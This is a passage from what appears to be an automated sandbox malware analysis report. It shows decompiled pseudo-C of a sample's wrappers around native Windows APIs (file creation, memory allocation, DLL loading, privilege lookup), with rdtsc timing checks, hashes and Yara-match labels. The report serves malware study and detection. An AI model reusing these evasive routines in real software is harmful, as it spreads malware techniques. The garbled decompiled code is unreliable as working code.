                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                    						return _v16;
                    					}
                    					return _t18;
                    				} else {
                    					return _t15;
                    				}
                    			}














                    APIs
                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: Load
                    • String ID:
                    • API String ID: 2234796835-0
                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 271 41a35a-41a35d 272 41a360-41a3a5 call 41af60 271->272 273 41a3a7-41a3b1 NtCreateFile 271->273 272->273
                    C-Code - Quality: 79%
                    			E0041A35A(void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                    				void* _v62;
                    				long _t22;
                    				void* _t34;
                    
                    				asm("lock jnp 0x4a");
                    				_t16 = _a4;
                    				_t4 = _t16 + 0xc40; // 0xc40
                    				E0041AF60(_t34, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                    				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                    				return _t22;
                    			}







                    APIs
                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: f53bba97eca0d91c0a91de91a1e3732046dc1a3467853b5625b36a7a8df1dd1c
                    • Instruction ID: 684d7f5abf03f03817ec3704d67b56e5a6037b44533e858ef8714a0877ac7ffa
                    • Opcode Fuzzy Hash: f53bba97eca0d91c0a91de91a1e3732046dc1a3467853b5625b36a7a8df1dd1c
                    • Instruction Fuzzy Hash: 7801A4B2201108AFDB08DF89DC85EEB77ADAF8C754F158248FA1DA7245C630E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 276 41a360-41a3b1 call 41af60 NtCreateFile
                    C-Code - Quality: 100%
                    			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                    				long _t21;
                    				void* _t31;
                    
                    				_t3 = _a4 + 0xc40; // 0xc40
                    				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                    				return _t21;
                    			}





                    APIs
                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                    • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                    • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 286 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                    C-Code - Quality: 100%
                    			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                    				long _t14;
                    				void* _t21;
                    
                    				_t3 = _a4 + 0xc60; // 0xca0
                    				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                    				return _t14;
                    			}





                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                    • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                    • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E0041A490(intOrPtr _a4, void* _a8) {
                    				long _t8;
                    				void* _t11;
                    
                    				asm("in al, dx");
                    				_t5 = _a4;
                    				_t2 = _t5 + 0x10; // 0x300
                    				_t3 = _t5 + 0xc50; // 0x40a943
                    				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                    				_t8 = NtClose(_a8); // executed
                    				return _t8;
                    			}





                    APIs
                    • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                    • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                    • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E0041A492() {
                    				long _t8;
                    				void* _t11;
                    				void* _t15;
                    
                    				asm("in al, dx");
                    				_t5 =  *((intOrPtr*)(_t15 + 8));
                    				_t2 = _t5 + 0x10; // 0x300
                    				_t3 = _t5 + 0xc50; // 0x40a943
                    				E0041AF60(_t11,  *((intOrPtr*)(_t15 + 8)), _t3,  *_t2, 0, 0x2c);
                    				_t8 = NtClose( *(_t15 + 0xc)); // executed
                    				return _t8;
                    			}






                    APIs
                    • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: 4d5e2dbbd0041423f9aaaba988b541f8f48cccb66c2812eccf193562f7620ca8
                    • Instruction ID: 48b49b566feccc7395fab601ee09e747f17eca396881e47cc366dec35a54d8cc
                    • Opcode Fuzzy Hash: 4d5e2dbbd0041423f9aaaba988b541f8f48cccb66c2812eccf193562f7620ca8
                    • Instruction Fuzzy Hash: 5BD05E76200214BFD710EFA8CC85FE77B68EF48764F158599BA1CDB242C530E61187E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 3239b010a517ae40c39989a472c856095933ce27151883d65057674f9f025466
                    • Instruction ID: d96c964cd511ebdd271d0b973c03eec6a722885d52ea0dec6f8183f1343b07e2
                    • Opcode Fuzzy Hash: 3239b010a517ae40c39989a472c856095933ce27151883d65057674f9f025466
                    • Instruction Fuzzy Hash: 109002B121100403D180759948457870009E7D0345F51C021A5054954EC7999DD577A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00409AB0(intOrPtr* _a4) {
                    				intOrPtr _v8;
                    				char _v24;
                    				char _v284;
                    				char _v804;
                    				char _v840;
                    				void* _t24;
                    				void* _t31;
                    				void* _t33;
                    				void* _t34;
                    				void* _t39;
                    				void* _t50;
                    				intOrPtr* _t52;
                    				void* _t53;
                    				void* _t54;
                    				void* _t55;
                    				void* _t56;
                    
                    				_t52 = _a4;
                    				_t39 = 0; // executed
                    				_t24 = E00407EA0(_t52,  &_v24); // executed
                    				_t54 = _t53 + 8;
                    				if(_t24 != 0) {
                    					E004080B0( &_v24,  &_v840);
                    					_t55 = _t54 + 8;
                    					do {
                    						E0041BE10( &_v284, 0x104);
                    						E0041C480( &_v284,  &_v804);
                    						_t56 = _t55 + 0x10;
                    						_t50 = 0x4f;
                    						while(1) {
                    							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
                    							_t56 = _t56 + 0x10;
                    							if(_t31 != 0) {
                    								break;
                    							}
                    							_t50 = _t50 + 1;
                    							if(_t50 <= 0x62) {
                    								continue;
                    							} else {
                    							}
                    							goto L8;
                    						}
                    						_t9 = _t52 + 0x14; // 0xffffe045
                    						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                    						_t39 = 1;
                    						L8:
                    						_t33 = E004080E0( &_v24,  &_v840);
                    						_t55 = _t56 + 8;
                    					} while (_t33 != 0 && _t39 == 0);
                    					_t34 = E00408160(_t52,  &_v24); // executed
                    					if(_t39 == 0) {
                    						asm("rdtsc");
                    						asm("rdtsc");
                    						_v8 = _t34 - 0 + _t34;
                    						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                    					}
                    					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                    					_t20 = _t52 + 0x31; // 0x5608758b
                    					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                    					return 1;
                    				} else {
                    					return _t24;
                    				}
                    			}



















                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                    • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                    • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                    • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 34%
                    			E0041A775(intOrPtr* __eax, void* __edx, WCHAR* _a12, WCHAR* _a16, struct _LUID* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36) {
                    				int _t19;
                    				void* _t25;
                    				void* _t36;
                    				void* _t37;
                    				intOrPtr* _t40;
                    				void* _t44;
                    
                    				_t1 = __edx + __eax;
                    				 *_t1 =  *(__edx + __eax) << 0x89;
                    				asm("aad 0x3a");
                    				_pop(_t44);
                    				if( *_t1 != 0) {
                    					asm("sbb [edx], cl");
                    					 *__eax =  *__eax + __eax;
                    					_push(_t37);
                    					E0041AF60(_t36, __eax, __eax + 0xc8c, _t25, 0, 0x46);
                    					_t19 = LookupPrivilegeValueW(_a12, _a16, _a20); // executed
                    					return _t19;
                    				} else {
                    					asm("sbb [ebp-0x75], dl");
                    					_t20 = _a12;
                    					_t5 = _t20 + 0xc88; // 0xd8c
                    					_t40 = _t5;
                    					E0041AF60(_t36, _a12, _t40, _a12[0x50a], 0, 0x39);
                    					_t6 =  &_a36; // 0x410a2e
                    					return  *((intOrPtr*)( *_t40))(_a16, _a20, _a24, _a28, _a32,  *_t6, _t37, _t44);
                    				}
                    			}









                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID: .AP
                    • API String ID: 3899507212-3996626295
                    • Opcode ID: 693b81085a6e6a0a407761b6877ac5d39d8b98da8d9dec14e598f0b4d6cb56f8
                    • Instruction ID: 1557a1216e0e588b710f1af5d7e977c0e1cc598010e38422b109feb866c11a0d
                    • Opcode Fuzzy Hash: 693b81085a6e6a0a407761b6877ac5d39d8b98da8d9dec14e598f0b4d6cb56f8
                    • Instruction Fuzzy Hash: 8211A1B52002486FCB11DF69DC41EEB3BA8EF89764F15828AF90C97242C530E815CBB4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 19 41a630-41a661 call 41af60 RtlAllocateHeap
                    C-Code - Quality: 100%
                    			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
                    				void* _t10;
                    				void* _t15;
                    
                    				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                    				_t6 =  &_a8; // 0x414536
                    				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                    				return _t10;
                    			}






                    APIs
                    • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: 6EA
                    • API String ID: 1279760036-1400015478
                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                    • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                    • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 217 408309-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 226 40835c-40836e PostThreadMessageW 217->226 227 40838e-408392 217->227 228 408370-40838a call 40a480 226->228 229 40838d 226->229 228->229 229->227
                    C-Code - Quality: 74%
                    			E00408309(void* __ebx, void* __fp0, intOrPtr _a4, long _a8) {
                    				char _v67;
                    				char _v68;
                    				void* _t12;
                    				int _t13;
                    				long _t22;
                    				int _t27;
                    				void* _t30;
                    				void* _t32;
                    				void* _t37;
                    
                    				_t37 = __ebx + 1;
                    				asm("in eax, 0x3f");
                    				[tword [eax-0x74aa3d01] = __fp0;
                    				_t30 = _t32;
                    				_v68 = 0;
                    				E0041BE60( &_v67, 0, 0x3f);
                    				E0041CA00( &_v68, 3);
                    				_t12 = E0040ACF0(_t37, _a4 + 0x1c,  &_v68); // executed
                    				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                    				_t27 = _t13;
                    				if(_t27 != 0) {
                    					_t22 = _a8;
                    					_t13 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
                    					_t39 = _t13;
                    					if(_t13 == 0) {
                    						_t13 =  *_t27(_t22, 0x8003, _t30 + (E0040A480(_t39, 1, 8) & 0x000000ff) - 0x40, _t13);
                    					}
                    				}
                    				return _t13;
                    			}













                    APIs
                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: bebf7df2c48c184cd7a25783415ede8887695987a8c51f0c9ad6567920801885
                    • Instruction ID: 9005fe3ccfc6f4faa8a7622fde66627b3cab750b7fa22ab33b26c5d7ccc70407
                    • Opcode Fuzzy Hash: bebf7df2c48c184cd7a25783415ede8887695987a8c51f0c9ad6567920801885
                    • Instruction Fuzzy Hash: 5401D871A8032876E721A6559D43FFE7B2C5B41F54F04015EFF04BA1C1EAA9690643EA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 241 408310-40831f 242 408328-40835a call 41ca00 call 40acf0 call 414e50 241->242 243 408323 call 41be60 241->243 250 40835c-40836e PostThreadMessageW 242->250 251 40838e-408392 242->251 243->242 252 408370-40838a call 40a480 250->252 253 40838d 250->253 252->253 253->251
                    C-Code - Quality: 82%
                    			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                    				char _v67;
                    				char _v68;
                    				void* _t12;
                    				intOrPtr* _t13;
                    				int _t14;
                    				long _t21;
                    				intOrPtr* _t25;
                    				void* _t26;
                    				void* _t30;
                    
                    				_t30 = __eflags;
                    				_v68 = 0;
                    				E0041BE60( &_v67, 0, 0x3f);
                    				E0041CA00( &_v68, 3);
                    				_t12 = E0040ACF0(_t30, _a4 + 0x1c,  &_v68); // executed
                    				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                    				_t25 = _t13;
                    				if(_t25 != 0) {
                    					_t21 = _a8;
                    					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                    					_t32 = _t14;
                    					if(_t14 == 0) {
                    						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                    					}
                    					return _t14;
                    				}
                    				return _t13;
                    			}













                    APIs
                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                    • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                    • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                    • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 280 41a662-41a665 281 41a622-41a62d 280->281 282 41a667-41a687 call 41af60 280->282 285 41a68c-41a6a1 RtlFreeHeap 282->285
                    C-Code - Quality: 35%
                    			E0041A662(void* __eax, signed int __ecx, void* __edx, void* _a4, long _a8, void* _a12) {
                    				char _v0;
                    				intOrPtr* __esi;
                    				signed int _t13;
                    				intOrPtr* _t16;
                    				signed int _t18;
                    
                    				_t13 = __ecx ^ _t18;
                    				_push(_t13);
                    				if(_t13 >= 0) {
                    					return  *((intOrPtr*)( *_t16))(__eax, __edx);
                    				} else {
                    					asm("in eax, dx");
                    					__dh = __dh +  *((intOrPtr*)(__ecx + 0xf));
                    					asm("cdq");
                    					asm("adc esp, [eax+0x55]");
                    					__ebp = __esp;
                    					__eax = _v0;
                    					__ecx =  *((intOrPtr*)(__eax + 0x10));
                    					_t6 = __eax + 0xc74; // 0xc74
                    					__esi = _t6;
                    					__eax = E0041AF60(__edi, __eax, __esi,  *((intOrPtr*)(__eax + 0x10)), 0, 0x35);
                    					__edx = _a12;
                    					__eax = _a8;
                    					__ecx = _a4;
                    					__edx =  *__esi;
                    					__eax = RtlFreeHeap(_a4, _a8, _a12); // executed
                    					__esi = __esi;
                    					__ebp = __ebp;
                    					return __eax;
                    				}
                    			}









                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: 9f7637e8d733c657de828b63c7499d1f7ce2c5b83a62cd3db227495cf57e608f
                    • Instruction ID: 44e973540ae73d37a977c81b5a1ed213c45ba4b46c911f6533b39226ee48d5a8
                    • Opcode Fuzzy Hash: 9f7637e8d733c657de828b63c7499d1f7ce2c5b83a62cd3db227495cf57e608f
                    • Instruction Fuzzy Hash: CFF090B12042046BCB08DFA5DC46EA737A8DF88758F15455DF94D97242D636E821C6A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 289 41a670-41a686 290 41a68c-41a6a1 RtlFreeHeap 289->290 291 41a687 call 41af60 289->291 291->290
                    C-Code - Quality: 100%
                    			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                    				char _t10;
                    				void* _t15;
                    
                    				_t3 = _a4 + 0xc74; // 0xc74
                    				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                    				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                    				return _t10;
                    			}






                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                    • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                    • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E0041A7D0(intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                    				intOrPtr* _t7;
                    				int _t10;
                    				intOrPtr _t11;
                    				void* _t15;
                    
                    				_t7 = _a4;
                    				_t11 =  *((intOrPtr*)(_t7 + 0xa18));
                    				asm("sbb [edx], cl");
                    				 *_t7 =  *_t7 + _t7;
                    				E0041AF60(_t15, _t7, _t7 + 0xc8c, _t11, 0, 0x46);
                    				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                    				return _t10;
                    			}








                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                    • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                    • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041A6B0(intOrPtr _a4, int _a8) {
                    				void* _t10;
                    
                    				_t5 = _a4;
                    				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                    				ExitProcess(_a8);
                    			}





                    APIs
                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                    • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                    • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E0041A6A2() {
                    				signed int _t7;
                    				void* _t14;
                    				signed int _t15;
                    				signed int _t16;
                    
                    				_t16 = _t15 | _t7;
                    				_t9 =  *0x0A7B5596;
                    				_push(_t16);
                    				E0041AF60(_t14,  *0x0A7B5596,  *0x0A7B5596 + 0xc7c,  *((intOrPtr*)(_t9 + 0xa14)), 0, 0x36);
                    				ExitProcess( *0x0A7B559A);
                    			}








                    APIs
                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                    Memory Dump Source
                    • Source File: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_idczzzzbpy.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 4d2ceb84a4e5ed7e6136e5f4e2db85ce7872116a18e43c2d6bcf32d5ada178a4
